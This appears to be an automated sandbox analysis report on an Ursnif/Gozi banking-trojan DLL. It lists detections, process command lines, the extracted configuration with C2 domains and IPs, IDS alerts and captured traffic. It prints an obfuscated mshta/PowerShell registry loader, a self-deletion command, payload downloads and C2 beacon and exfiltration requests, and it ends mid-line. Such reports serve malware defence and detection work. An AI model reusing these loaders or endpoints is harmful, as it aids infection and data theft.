
Windows Analysis Report
2oCOO5LbPu.dll

Overview

General Information

Sample Name: 2oCOO5LbPu.dll
Analysis ID: 620323
MD5: 1217ff59e80cdae525287f2c6e9a43c6
SHA1: 71760323e2c6528c2d346d85c9a138edcea984aa
SHA256: 315b13c6d80997dd76a01c15b78651d7a1cb54f8432fc25ad95c8573ba4b52d6
Tags: dll, geo, Gozi, ISFB, ITA, Ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Tries to steal Mail credentials (via file / registry access)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Uses nslookup.exe to query domains
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Allocates memory in foreign processes
May check the online IP address of the machine
Self deletion via cmd delete
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Tries to harvest and steal browser information (history, passwords, etc)
Writes to foreign memory regions
Changes memory attributes in foreign processes to executable or writable
Uses ping.exe to check the status of other devices and networks
Modifies the prolog of user mode functions (user mode inline hooks)
Uses ping.exe to sleep
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Modifies the import address table of user mode modules (user mode IAT hooks)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Checks if the current process is being debugged
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • loaddll32.exe (PID: 3708 cmdline: loaddll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll" MD5: 7DEB5DB86C0AC789123DEC286286B938)
    • cmd.exe (PID: 4640 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 2284 cmdline: rundll32.exe "C:\Users\user\Desktop\2oCOO5LbPu.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 7000 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
          • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
            • cmd.exe (PID: 4040 cmdline: C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\user\Desktop\2oCOO5LbPu.dll MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • PING.EXE (PID: 3088 cmdline: ping localhost -n 5 MD5: 6A7389ECE70FB97BFE9A570DB4ACCC3B)
            • RuntimeBroker.exe (PID: 4440 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 5016 cmdline: cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\user\AppData\Local\Temp\1E0C.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 4948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
              • nslookup.exe (PID: 5996 cmdline: nslookup myip.opendns.com resolver1.opendns.com MD5: AF1787F1DBE0053D74FC687E7233F8CE)
            • cmd.exe (PID: 3248 cmdline: cmd /C "echo -------- >> C:\Users\user\AppData\Local\Temp\1E0C.bi1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 3104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • RuntimeBroker.exe (PID: 4724 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
            • cmd.exe (PID: 5472 cmdline: cmd /C "systeminfo.exe > C:\Users\user\AppData\Local\Temp\2E09.bin1" MD5: 4E2ACF4F8A396486AB4268C94A6A245F)
              • conhost.exe (PID: 1008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
            • RuntimeBroker.exe (PID: 4960 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: C7E36B4A5D9E6AC600DD7A0E0D52DAC5)
          • rundll32.exe (PID: 5180 cmdline: "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL -h MD5: 73C519F050C20580F8A62C849D49215A)
  • mshta.exe (PID: 6576 cmdline: C:\Windows\System32\mshta.exe" "about:<hta:application><script>Cq7h='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cq7h).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script> MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 6680 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name jasvusrvks -value gp; new-alias -name ssmthn -value iex; ssmthn ([System.Text.Encoding]::ASCII.GetString((jasvusrvks "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 6932 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6972 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3A11.tmp" "c:\Users\user\AppData\Local\Temp\ykprd3xj\CSC234B0D107E494378839C776CED666FC7.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 7008 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dyznokx3\dyznokx3.cmdline MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7024 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5431.tmp" "c:\Users\user\AppData\Local\Temp\dyznokx3\CSCF033825E263E4DFC98584E77F08A80E9.TMP" MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
  • cleanup
{"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source | Rule | Description | Author | Strings
00000018.00000000.389053919.0000000000520000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000018.00000000.388260255.0000000000520000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000024.00000000.486983679.000001F9BBE30000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
0000002D.00000002.783998250.000001FFC4C02000.00000004.00000001.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Source | Rule | Description | Author | Strings
2.3.rundll32.exe.52f94a0.10.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.52f94a0.10.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.2.rundll32.exe.36d0000.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.586a4a0.0.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
2.3.rundll32.exe.5916b40.2.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security |
                      No Sigma rule has matched
Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
05/04/22-16:19:17.575336 | 2033203 | 49761 | 80 | TCP | A Network Trojan was detected
05/04/22-16:21:22.118696 | 2823044 | 49824 | 80 | TCP | A Network Trojan was detected
05/04/22-16:19:19.326271 | 2033203 | 49761 | 80 | TCP | A Network Trojan was detected
05/04/22-16:18:57.385228 | 2033203 | 49759 | 80 | TCP | A Network Trojan was detected
05/04/22-16:21:20.986284 | 2031743 | 49823 | 80 | TCP | A Network Trojan was detected
05/04/22-16:21:21.354584 | 2031744 | 49823 | 80 | TCP | A Network Trojan was detected
05/04/22-16:21:23.154439 | 2823044 | 49825 | 80 | TCP | A Network Trojan was detected
05/04/22-16:19:18.765869 | 2033203 | 49761 | 80 | TCP | A Network Trojan was detected
05/04/22-16:21:35.078524 | 2831962 | 49836 | 80 | TCP | A Network Trojan was detected
05/04/22-16:21:37.325898 | 2831962 | 49845 | 80 | TCP | A Network Trojan was detected


                      AV Detection

Source: http://193.56.146.127/stilak32.rar | Avira URL Cloud: Label: malware
Source: http://cabrioxmdes.at/images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif | Avira URL Cloud: Label: malware
Source: http://193.56.146.127/stilak64.rar | Avira URL Cloud: Label: malware
Source: http://193.56.146.127/cook32.rar | Avira URL Cloud: Label: malware
Source: http://cabrioxmdes.at/images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp | Avira URL Cloud: Label: malware
Source: http://193.56.146.127/cook64.rar | Avira URL Cloud: Label: malware
Source: http://cabrioxmdes.at/images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp | Avira URL Cloud: Label: malware
Source: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp | Malware Configuration Extractor: Ursnif {"RSA Public Key": "WDHdIpDR32hiBF82vKyfbd4Aeqb2endsG7KPr9+PRwpFwh6xHOPeXmivTfHV1J5O9BbOekXP+fpLTlNw78j8NdT4sNAaVFSXIxeuXWdoUw6r5lOTidqS1cBNYe3P3AFASRESMg14/OvBfHcw2QScm4OJeiHSYe26nzRyCo9Bsx0twNSvxA9Ev6ecU3aTGDNOX6EO6pfJFTv3oxkLljtitiqLzJjGUeio8ebUBdVSKBHjVo6ZyneL/fS9OUJFMNJ7HNXH2S3/amCXZuSmGf5nGAp2ln8QhGUUaVVkgcswKSlhcM0caruAqxzK8wdEz4NJO3xL/S8BTA8Kjk8SIMljp4q8BLwzx+qosOvcvZK8zl8=", "c2_domain": ["config.edge.skype.com", "cabrioxmdes.at", "gamexperts.net", "185.189.151.181", "185.189.151.186"], "ip_check_url": ["http://ipinfo.io/ip", "http://curlmyip.net"], "serpent_key": "Jv1GYc8A8hCBIeVD", "tor32_dll": "file://c:\\test\\test32.dll", "tor64_dll": "file://c:\\test\\tor64.dll", "server": "50", "sleep_time": "1", "SetWaitableTimer_value(CRC_CONFIGTIMEOUT)": "60", "time_value": "60", "SetWaitableTimer_value(CRC_TASKTIMEOUT)": "60", "SetWaitableTimer_value(CRC_SENDTIMEOUT)": "300", "SetWaitableTimer_value(CRC_KNOCKERTIMEOUT)": "60", "not_use(CRC_BCTIMEOUT)": "10", "botnet": "3000", "SetWaitableTimer_value": "1"}
Source: 2oCOO5LbPu.dll | ReversingLabs: Detection: 50%
Source: 2oCOO5LbPu.dll | Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_036D5FBB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: 2oCOO5LbPu.dll | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdb8 source: powershell.exe, 00000014.00000002.566709177.0000012312B1D000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: d:\in\the\town\where\ahung.pdb source: 2oCOO5LbPu.dll
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000002.00000003.381155615.00000000068B0000.00000004.00001000.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.385084346.00000000068B0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\ykprd3xj\ykprd3xj.pdbXP source: powershell.exe, 00000014.00000002.568732109.0000012312B68000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0627FD47 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\ActionCenterCache
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
Source: C:\Windows\System32\RuntimeBroker.exe | File opened: C:\Users\user\AppData\Local\Microsoft
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062765C2 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_0628BAD1 lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 2_2_062799BC lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,

                      Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 185.189.151.28 80
Source: C:\Windows\explorer.exe | Domain query: gamexperts.net
Source: C:\Windows\explorer.exe | Domain query: cabrioxmdes.at
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49759 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49761 -> 185.189.151.28:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49761 -> 185.189.151.28:80
Source: Traffic | Snort IDS: 2031743 ET TROJAN Ursnif Payload Request (cook32.rar) 192.168.2.4:49823 -> 193.56.146.127:80
Source: Traffic | Snort IDS: 2031744 ET TROJAN Ursnif Payload Request (cook64.rar) 192.168.2.4:49823 -> 193.56.146.127:80
Source: Traffic | Snort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49824 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49824 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49824 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49824 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2823044 ETPRO TROJAN W32.Dreambot Checkin 192.168.2.4:49824 -> 13.107.43.16:80
Source: Traffic | Snort IDS: 2021813 ET TROJAN Ursnif Variant CnC Beacon 192.168.2.4:49825 -> 116.121.62.237:80
Source: Traffic | Snort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49825 -> 116.121.62.237:80
Source: Traffic | Snort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49825 -> 116.121.62.237:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49825 -> 116.121.62.237:80
Source: Traffic | Snort IDS: 2823044 ETPRO TROJAN W32.Dreambot Checkin 192.168.2.4:49825 -> 116.121.62.237:80
Source: Traffic | Snort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.4:49836 -> 116.121.62.237:80
Source: Traffic | Snort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49836 -> 116.121.62.237:80
Source: Traffic | Snort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49836 -> 116.121.62.237:80
Source: Traffic | Snort IDS: 2021830 ET TROJAN Ursnif Variant CnC Data Exfil 192.168.2.4:49845 -> 116.121.62.237:80
Source: Traffic | Snort IDS: 2831963 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M2 192.168.2.4:49845 -> 116.121.62.237:80
Source: Traffic | Snort IDS: 2831962 ETPRO TROJAN Ursnif Variant CnC Beacon 8 M1 192.168.2.4:49845 -> 116.121.62.237:80
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\nslookup.exe nslookup myip.opendns.com resolver1.opendns.com
Source: C:\Windows\System32\nslookup.exe | DNS query: name: myip.opendns.com
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: global traffic | HTTP traffic detected: GET /drew/VaQ3pTys7Q2R6kpf/_2FIc_2F8CXvB3Z/iOcDCMv_2Bzt_2BkvD/0oAvhggmG/_2Fl1lo2G6zaBPziefOU/0weuiBbGeNMoLKM6iCO/t_2BCeHyFsnS9bYnhwNoEp/71L2csZUwuj6M/Di72h_2F/YKcRH2nZoqJfjSIVybnSQum/ojRn6CbyHg/HZSkJJ16taI_2BtJ_/2BPgmXmwBiuC/GeqX1VmOJwL/BLm5b43yKc8DM1/cAyjDLhuSh3YL8e2h3G86/An0inHEid52NS1pJ/fzGWg5Z6i/S.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/ftkCw_2FHRlZ2H4Ez/kZzLPSWW1EjO/vrmRPaaHdKz/qSrMackZ3zyqc0/VWwRh_2FwCauXlH76SpSQ/WebWjWKotWlEjZol/i0khlMGcdRnqbLJ/HlNBrT1E6GXaxDAWHo/UE921lN_2/FjqHF75OT4VsLwnjVixS/PbEwWP4onYE8hLJvBBX/d_2BgNcvh2ZXGjR5_2FyXa/S5_2BQHrje5lp/MVCT87wg/yCb3LwnNfDTI2igwyNHJuPu/wEyNxQ1wIj/6Ok6nHxwE/MHgaOPodjh/7.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/j2JffNlXTHLPSjvkab/vvawbyEnZ/Hwlvs3aqIXBaZtIhRcgj/4HXnxsMpDrDAMvyWm_2/FmVqdMEPLr3zfDmaxNGUay/bz_2BSMy1l2QZ/EUwY7mKI/BhGCRzr1OkkgVWxbqU3mkVE/wA3v0qd0nJ/5B7wfgqElhGpmz3sa/_2F6sQ8OT_2B/8xTtmUQcdaG/oTkIYSJR4gLWwl/QQTNVlqw4bQdTnzAZ6CQ7/k1kym0P_2B_2FUsc/x2oonw84wvEvNXM/7_2BWWPnJGDR/PuJeNv7kx/T.jlk HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 185.189.151.28Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /stilak32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /stilak64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /cook32.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /cook64.rar HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: 193.56.146.127Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /images/V0NO_2B_2/BKtxKUyqNZPWTGW_2Fsb/gcra1vUcqfsugEwbqkg/clC4xOvGOnv1IfCbC3KpDN/55o4c2l5_2FQ5/A5h2Nudl/_2BMxe_2B5DeFfkUNA5tHFs/S3JUh8OxeK/2_2FH31SGSIQagA1v/1cdYZqzVHkrq/508837BCT1F/BqNIRlNPeT4DuE/7TejdrPxV03GXRoV_2Bn_/2BLetz9nfjFhAFKH/XzqzBZbDgeQBfEL/knvoVinzLGANv8j5GP/MiBxeoPgM/h0e0hiZpA4rDs4gKFEOR/z8BKZois5KcoiHgGkl6/XYwiOQ0Qo28lWHm/byQpQm.gif HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atConnection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /images/ycZgts7gGB1TTI_2BJ/kAFzWH5dO/EouFwEOlBnMQFd_2B9cm/hFllbR62yV2D6DpnFIT/1m7iL_2BNn_2FiW_2Fey46/UbiTO8_2BKiyZ/X_2Fw6C8/_2BYemffpjXv9AYl0VWdt5P/DII_2F9NDv/YDhvS6DNSnB9Ol87V/O37_2FvxkOTf/eEAAdQaaXJB/BDgwSc3qOdxCUN/5Mw_2FSE2hFdSZTrFlwZP/7mWxeoDw9vW5V8uP/HsY9e6csLMEHi74/FnD5yUP5tDxrs5O87k/gamDdyFb5/q42.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=318247997342640097891112487322User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atContent-Length: 563Connection: Keep-AliveCache-Control: no-cache
Source: global traffic | HTTP traffic detected: POST /images/x2n_2BZq/cMTCmy3PTwcmYJsQtcFfdmd/RGHbCfH0Mi/_2F2XXxRKDznMaDCu/6VijCL7TOw6A/_2FZwep2qr_/2FWEPkZM5AVXte/9aqioax34nJsL5Jif0tvs/L_2FZYT61ziDpxF7/LpFCetnlC9m_2Bt/oUT730x_2F0HUFQM3Y/XzNhPma_2/B16XqKLqfQsgSGMPR6I2/0aqjgbQwdUeD2pbxvCW/nFGCHfIsUA4BQ8wKgww64R/38SNs6vk5dFLz/lF2ZfIKN/ONI_2FioD0xOFaZ_2BUESxI/wtoW_2F78Wali9Dqxz_/2F8R.bmp HTTP/1.1Content-Type: multipart/form-data; boundary=315998012542640097891134987170User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0; Win64; x64)Host: cabrioxmdes.atContent-Length: 387Connection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View | ASN Name: LVLT-10753US
Source: Joe Sandbox View | ASN Name: CJNET-ASCheiljedangCoIncKR
Source: Joe Sandbox View | IP Address: 116.121.62.237
Source: rundll32.exe, 00000002.00000003.375671182.0000000006898000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.395315890.00000123276AC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.455935177.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390731563.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000003.390864637.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000018.00000002.485699109.000001D8405BC000.00000004.00000020.00020000.00000000.sdmp, RuntimeBroker.exe, 00000024.00000002.783581138.000001F9BC102000.00000004.00000001.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466969074.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000025.00000003.466321410.0000015723E2C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 